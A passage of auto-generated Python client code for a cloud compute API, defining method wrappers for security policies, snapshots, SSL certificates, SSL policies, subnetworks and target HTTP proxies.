relative_path=u'projects/{project}/global/securityPolicies/{securityPolicy}',
request_field='',
request_type_name=u'ComputeSecurityPoliciesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""List all of the ordered rules present in a single specified policy.
Args:
request: (ComputeSecurityPoliciesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SecurityPolicy) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.securityPolicies.get',
ordered_params=[u'project', u'securityPolicy'],
path_params=[u'project', u'securityPolicy'],
query_params=[],
relative_path=u'projects/{project}/global/securityPolicies/{securityPolicy}',
request_field='',
request_type_name=u'ComputeSecurityPoliciesGetRequest',
response_type_name=u'SecurityPolicy',
supports_download=False,
)
def GetRule(self, request, global_params=None):
"""Gets a rule at the specified priority.
Args:
request: (ComputeSecurityPoliciesGetRuleRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SecurityPolicyRule) The response message.
"""
config = self.GetMethodConfig('GetRule')
return self._RunMethod(
config, request, global_params=global_params)
GetRule.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.securityPolicies.getRule',
ordered_params=[u'project', u'securityPolicy'],
path_params=[u'project', u'securityPolicy'],
query_params=[u'priority'],
relative_path=u'projects/{project}/global/securityPolicies/{securityPolicy}/getRule',
request_field='',
request_type_name=u'ComputeSecurityPoliciesGetRuleRequest',
response_type_name=u'SecurityPolicyRule',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a new policy in the specified project using the data included in the request.
Args:
request: (ComputeSecurityPoliciesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.securityPolicies.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/securityPolicies',
request_field=u'securityPolicy',
request_type_name=u'ComputeSecurityPoliciesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""List all the policies that have been configured for the specified project.
Args:
request: (ComputeSecurityPoliciesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SecurityPolicyList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.securityPolicies.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/securityPolicies',
request_field='',
request_type_name=u'ComputeSecurityPoliciesListRequest',
response_type_name=u'SecurityPolicyList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Patches the specified policy with the data included in the request.
Args:
request: (ComputeSecurityPoliciesPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.securityPolicies.patch',
ordered_params=[u'project', u'securityPolicy'],
path_params=[u'project', u'securityPolicy'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/securityPolicies/{securityPolicy}',
request_field=u'securityPolicyResource',
request_type_name=u'ComputeSecurityPoliciesPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def PatchRule(self, request, global_params=None):
"""Patches a rule at the specified priority.
Args:
request: (ComputeSecurityPoliciesPatchRuleRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('PatchRule')
return self._RunMethod(
config, request, global_params=global_params)
PatchRule.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.securityPolicies.patchRule',
ordered_params=[u'project', u'securityPolicy'],
path_params=[u'project', u'securityPolicy'],
query_params=[u'priority'],
relative_path=u'projects/{project}/global/securityPolicies/{securityPolicy}/patchRule',
request_field=u'securityPolicyRule',
request_type_name=u'ComputeSecurityPoliciesPatchRuleRequest',
response_type_name=u'Operation',
supports_download=False,
)
def RemoveRule(self, request, global_params=None):
"""Deletes a rule at the specified priority.
Args:
request: (ComputeSecurityPoliciesRemoveRuleRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('RemoveRule')
return self._RunMethod(
config, request, global_params=global_params)
RemoveRule.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.securityPolicies.removeRule',
ordered_params=[u'project', u'securityPolicy'],
path_params=[u'project', u'securityPolicy'],
query_params=[u'priority'],
relative_path=u'projects/{project}/global/securityPolicies/{securityPolicy}/removeRule',
request_field='',
request_type_name=u'ComputeSecurityPoliciesRemoveRuleRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeSecurityPoliciesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.securityPolicies.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/securityPolicies/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeSecurityPoliciesTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class SnapshotsService(base_api.BaseApiService):
"""Service class for the snapshots resource."""
_NAME = u'snapshots'
def __init__(self, client):
super(ComputeBeta.SnapshotsService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified Snapshot resource. Keep in mind that deleting a single snapshot might not necessarily delete all the data on that snapshot. If any data on the snapshot that is marked for deletion is needed for subsequent snapshots, the data will be moved to the next corresponding snapshot.
For more information, see Deleting snaphots.
Args:
request: (ComputeSnapshotsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.snapshots.delete',
ordered_params=[u'project', u'snapshot'],
path_params=[u'project', u'snapshot'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/snapshots/{snapshot}',
request_field='',
request_type_name=u'ComputeSnapshotsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified Snapshot resource. Get a list of available snapshots by making a list() request.
Args:
request: (ComputeSnapshotsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Snapshot) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.snapshots.get',
ordered_params=[u'project', u'snapshot'],
path_params=[u'project', u'snapshot'],
query_params=[],
relative_path=u'projects/{project}/global/snapshots/{snapshot}',
request_field='',
request_type_name=u'ComputeSnapshotsGetRequest',
response_type_name=u'Snapshot',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of Snapshot resources contained within the specified project.
Args:
request: (ComputeSnapshotsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SnapshotList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.snapshots.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/snapshots',
request_field='',
request_type_name=u'ComputeSnapshotsListRequest',
response_type_name=u'SnapshotList',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on a snapshot. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeSnapshotsSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.snapshots.setLabels',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/snapshots/{resource}/setLabels',
request_field=u'globalSetLabelsRequest',
request_type_name=u'ComputeSnapshotsSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeSnapshotsTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.snapshots.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/snapshots/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeSnapshotsTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class SslCertificatesService(base_api.BaseApiService):
"""Service class for the sslCertificates resource."""
_NAME = u'sslCertificates'
def __init__(self, client):
super(ComputeBeta.SslCertificatesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified SslCertificate resource.
Args:
request: (ComputeSslCertificatesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.sslCertificates.delete',
ordered_params=[u'project', u'sslCertificate'],
path_params=[u'project', u'sslCertificate'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/sslCertificates/{sslCertificate}',
request_field='',
request_type_name=u'ComputeSslCertificatesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified SslCertificate resource. Get a list of available SSL certificates by making a list() request.
Args:
request: (ComputeSslCertificatesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SslCertificate) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.sslCertificates.get',
ordered_params=[u'project', u'sslCertificate'],
path_params=[u'project', u'sslCertificate'],
query_params=[],
relative_path=u'projects/{project}/global/sslCertificates/{sslCertificate}',
request_field='',
request_type_name=u'ComputeSslCertificatesGetRequest',
response_type_name=u'SslCertificate',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a SslCertificate resource in the specified project using the data included in the request.
Args:
request: (ComputeSslCertificatesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.sslCertificates.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/sslCertificates',
request_field=u'sslCertificate',
request_type_name=u'ComputeSslCertificatesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of SslCertificate resources available to the specified project.
Args:
request: (ComputeSslCertificatesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SslCertificateList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.sslCertificates.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/sslCertificates',
request_field='',
request_type_name=u'ComputeSslCertificatesListRequest',
response_type_name=u'SslCertificateList',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeSslCertificatesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.sslCertificates.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/sslCertificates/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeSslCertificatesTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class SslPoliciesService(base_api.BaseApiService):
"""Service class for the sslPolicies resource."""
_NAME = u'sslPolicies'
def __init__(self, client):
super(ComputeBeta.SslPoliciesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified SSL policy. The SSL policy resource can be deleted only if it is not in use by any TargetHttpsProxy or TargetSslProxy resources.
Args:
request: (ComputeSslPoliciesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.sslPolicies.delete',
ordered_params=[u'project', u'sslPolicy'],
path_params=[u'project', u'sslPolicy'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/sslPolicies/{sslPolicy}',
request_field='',
request_type_name=u'ComputeSslPoliciesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Lists all of the ordered rules present in a single specified policy.
Args:
request: (ComputeSslPoliciesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SslPolicy) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.sslPolicies.get',
ordered_params=[u'project', u'sslPolicy'],
path_params=[u'project', u'sslPolicy'],
query_params=[],
relative_path=u'projects/{project}/global/sslPolicies/{sslPolicy}',
request_field='',
request_type_name=u'ComputeSslPoliciesGetRequest',
response_type_name=u'SslPolicy',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Returns the specified SSL policy resource. Get a list of available SSL policies by making a list() request.
Args:
request: (ComputeSslPoliciesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.sslPolicies.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/sslPolicies',
request_field=u'sslPolicy',
request_type_name=u'ComputeSslPoliciesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Lists all the SSL policies that have been configured for the specified project.
Args:
request: (ComputeSslPoliciesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SslPoliciesList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.sslPolicies.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/sslPolicies',
request_field='',
request_type_name=u'ComputeSslPoliciesListRequest',
response_type_name=u'SslPoliciesList',
supports_download=False,
)
def ListAvailableFeatures(self, request, global_params=None):
"""Lists all features that can be specified in the SSL policy when using custom profile.
Args:
request: (ComputeSslPoliciesListAvailableFeaturesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SslPoliciesListAvailableFeaturesResponse) The response message.
"""
config = self.GetMethodConfig('ListAvailableFeatures')
return self._RunMethod(
config, request, global_params=global_params)
ListAvailableFeatures.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.sslPolicies.listAvailableFeatures',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/sslPolicies/listAvailableFeatures',
request_field='',
request_type_name=u'ComputeSslPoliciesListAvailableFeaturesRequest',
response_type_name=u'SslPoliciesListAvailableFeaturesResponse',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Patches the specified SSL policy with the data included in the request.
Args:
request: (ComputeSslPoliciesPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.sslPolicies.patch',
ordered_params=[u'project', u'sslPolicy'],
path_params=[u'project', u'sslPolicy'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/sslPolicies/{sslPolicy}',
request_field=u'sslPolicyResource',
request_type_name=u'ComputeSslPoliciesPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeSslPoliciesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.sslPolicies.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/sslPolicies/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeSslPoliciesTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class SubnetworksService(base_api.BaseApiService):
"""Service class for the subnetworks resource."""
_NAME = u'subnetworks'
def __init__(self, client):
super(ComputeBeta.SubnetworksService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of subnetworks.
Args:
request: (ComputeSubnetworksAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SubnetworkAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.subnetworks.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/subnetworks',
request_field='',
request_type_name=u'ComputeSubnetworksAggregatedListRequest',
response_type_name=u'SubnetworkAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified subnetwork.
Args:
request: (ComputeSubnetworksDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.subnetworks.delete',
ordered_params=[u'project', u'region', u'subnetwork'],
path_params=[u'project', u'region', u'subnetwork'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/subnetworks/{subnetwork}',
request_field='',
request_type_name=u'ComputeSubnetworksDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def ExpandIpCidrRange(self, request, global_params=None):
"""Expands the IP CIDR range of the subnetwork to a specified value.
Args:
request: (ComputeSubnetworksExpandIpCidrRangeRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('ExpandIpCidrRange')
return self._RunMethod(
config, request, global_params=global_params)
ExpandIpCidrRange.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.subnetworks.expandIpCidrRange',
ordered_params=[u'project', u'region', u'subnetwork'],
path_params=[u'project', u'region', u'subnetwork'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/subnetworks/{subnetwork}/expandIpCidrRange',
request_field=u'subnetworksExpandIpCidrRangeRequest',
request_type_name=u'ComputeSubnetworksExpandIpCidrRangeRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified subnetwork. Get a list of available subnetworks list() request.
Args:
request: (ComputeSubnetworksGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Subnetwork) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.subnetworks.get',
ordered_params=[u'project', u'region', u'subnetwork'],
path_params=[u'project', u'region', u'subnetwork'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/subnetworks/{subnetwork}',
request_field='',
request_type_name=u'ComputeSubnetworksGetRequest',
response_type_name=u'Subnetwork',
supports_download=False,
)
def GetIamPolicy(self, request, global_params=None):
"""Gets the access control policy for a resource. May be empty if no such policy or resource exists.
Args:
request: (ComputeSubnetworksGetIamPolicyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Policy) The response message.
"""
config = self.GetMethodConfig('GetIamPolicy')
return self._RunMethod(
config, request, global_params=global_params)
GetIamPolicy.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.subnetworks.getIamPolicy',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/subnetworks/{resource}/getIamPolicy',
request_field='',
request_type_name=u'ComputeSubnetworksGetIamPolicyRequest',
response_type_name=u'Policy',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a subnetwork in the specified project using the data included in the request.
Args:
request: (ComputeSubnetworksInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.subnetworks.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/subnetworks',
request_field=u'subnetwork',
request_type_name=u'ComputeSubnetworksInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of subnetworks available to the specified project.
Args:
request: (ComputeSubnetworksListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SubnetworkList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.subnetworks.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/subnetworks',
request_field='',
request_type_name=u'ComputeSubnetworksListRequest',
response_type_name=u'SubnetworkList',
supports_download=False,
)
def ListUsable(self, request, global_params=None):
"""Retrieves an aggregated list of usable subnetworks.
Args:
request: (ComputeSubnetworksListUsableRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(UsableSubnetworksAggregatedList) The response message.
"""
config = self.GetMethodConfig('ListUsable')
return self._RunMethod(
config, request, global_params=global_params)
ListUsable.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.subnetworks.listUsable',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/subnetworks/listUsable',
request_field='',
request_type_name=u'ComputeSubnetworksListUsableRequest',
response_type_name=u'UsableSubnetworksAggregatedList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Patches the specified subnetwork with the data included in the request. Only the following fields within the subnetwork resource can be specified in the request: secondary_ip_range, allow_subnet_cidr_routes_overlap and role. It is also mandatory to specify the current fingeprint of the subnetwork resource being patched.
Args:
request: (ComputeSubnetworksPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.subnetworks.patch',
ordered_params=[u'project', u'region', u'subnetwork'],
path_params=[u'project', u'region', u'subnetwork'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/subnetworks/{subnetwork}',
request_field=u'subnetworkResource',
request_type_name=u'ComputeSubnetworksPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetIamPolicy(self, request, global_params=None):
"""Sets the access control policy on the specified resource. Replaces any existing policy.
Args:
request: (ComputeSubnetworksSetIamPolicyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Policy) The response message.
"""
config = self.GetMethodConfig('SetIamPolicy')
return self._RunMethod(
config, request, global_params=global_params)
SetIamPolicy.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.subnetworks.setIamPolicy',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/subnetworks/{resource}/setIamPolicy',
request_field=u'policy',
request_type_name=u'ComputeSubnetworksSetIamPolicyRequest',
response_type_name=u'Policy',
supports_download=False,
)
def SetPrivateIpGoogleAccess(self, request, global_params=None):
"""Set whether VMs in this subnet can access Google services without assigning external IP addresses through Private Google Access.
Args:
request: (ComputeSubnetworksSetPrivateIpGoogleAccessRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetPrivateIpGoogleAccess')
return self._RunMethod(
config, request, global_params=global_params)
SetPrivateIpGoogleAccess.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.subnetworks.setPrivateIpGoogleAccess',
ordered_params=[u'project', u'region', u'subnetwork'],
path_params=[u'project', u'region', u'subnetwork'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/subnetworks/{subnetwork}/setPrivateIpGoogleAccess',
request_field=u'subnetworksSetPrivateIpGoogleAccessRequest',
request_type_name=u'ComputeSubnetworksSetPrivateIpGoogleAccessRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeSubnetworksTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.subnetworks.testIamPermissions',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/subnetworks/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeSubnetworksTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class TargetHttpProxiesService(base_api.BaseApiService):
"""Service class for the targetHttpProxies resource."""
_NAME = u'targetHttpProxies'
def __init__(self, client):
super(ComputeBeta.TargetHttpProxiesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified TargetHttpProxy resource.
Args:
request: (ComputeTargetHttpProxiesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.targetHttpProxies.delete',
ordered_params=[u'project', u'targetHttpProxy'],
path_params=[u'project', u'targetHttpProxy'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/targetHttpProxies/{targetHttpProxy}',
request_field='',
request_type_name=u'ComputeTargetHttpProxiesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified TargetHttpProxy resource. Get a list of available target HTTP proxies by making a list() request.
Args:
request: (ComputeTargetHttpProxiesGetRequest) input message
